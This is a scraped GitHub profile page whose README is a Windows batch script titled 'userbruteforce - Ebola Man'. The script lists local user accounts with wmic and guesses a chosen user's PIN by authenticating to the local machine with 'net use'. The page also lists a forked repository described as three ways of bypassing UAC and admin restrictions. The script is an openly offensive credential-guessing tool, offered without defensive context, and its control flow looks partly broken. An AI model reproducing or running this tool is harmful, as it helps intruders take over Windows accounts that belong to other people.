Skip to content
View SC7-TECH's full-sized avatar

Block or report SC7-TECH

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse
SC7-TECH/README.md

@echo off title userbruteforce - Ebola Man setlocal enabledelayedexpansion chcp 65001 >nul :start cls set error=- color F set user="" echo. echo . __ _____
echo _ ^|
______ __ / ^| / _ ____ ____
echo ^| __ _ __ \ ^| \ __/ __ \ __/ _ _ __ _/ / __ \ echo ^| _\ \ ^| / ^| /^| ^| \ /^| ^| ( ^<^> ) ^| /\ _\ / echo ^| /^| ^|
/ ^|^| _ ^>^| _/^|^| _ ^>___ ^> echo / / / / echo. echo ╔════════════════════╗ echo ║ COMMANDS: ║ echo ║ ║ echo ║ 1. List Users ║ echo ║ 2. Bruteforce ║ echo ║ 3. Exit ║ echo ╚════════════════════╝ :input set /p "=>> " <nul choice /c 123 >nul

if /I "%errorlevel%" EQU "1" ( echo. echo. wmic useraccount where "localaccount='true'" get name,sid,status goto input )

if /I "%errorlevel%" EQU "2" ( goto bruteforce )

if /I "%errorlevel%" EQU "3" ( exit )

:bruteforce set /a count=1 echo. echo. echo [TARGET USER] set /p user=">> " echo. echo [PIN] set /p pin=">> " net user %user% >nul 2>&1 if /I "%errorlevel%" NEQ "0" ( echo. echo �[91m[%error%]�[0m �[97mUser doesn't exist�[0m pause >nul goto start ) net use \127.0.0.1 /d /y >nul 2>&1 echo. echo [ATTEMPT %count%] [%pin%] call :varset echo. echo �[91m[%error%]�[0m �[97mPIN not found�[0m pause >nul goto start

:success echo. echo �[92m[+]�[0m �[97mPIN found: %pin%�[0m net use \127.0.0.1 /d /y >nul 2>&1 set user= set pin= echo. pause >nul goto start

:varset net use \127.0.0.1 /user:%user% %pin% >nul 2>&1 if /I "%errorlevel%" EQU "0" goto success net use | find "\127.0.0.1" >nul if /I "%errorlevel%" EQU "0" goto success set /a count=%count%+1 goto :eof

goto start

Popular repositories Loading

  1. SC7-TECH SC7-TECH Public

    Config files for my GitHub profile.

  2. UAC-Bypass UAC-Bypass Public

    Forked from EbolaMan-YT/UAC-Bypass

    3 ways of bypassing admin restrictions/uac

    Batchfile

0 contributions in the last year

Contribution Graph
Day of Week April May June July August September October November December January February March
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
Less
No contributions.
Low contributions.
Medium-low contributions.
Medium-high contributions.
High contributions.
More

Contribution activity

March 2025

SC7-TECH has no activity yet for this period.
Loading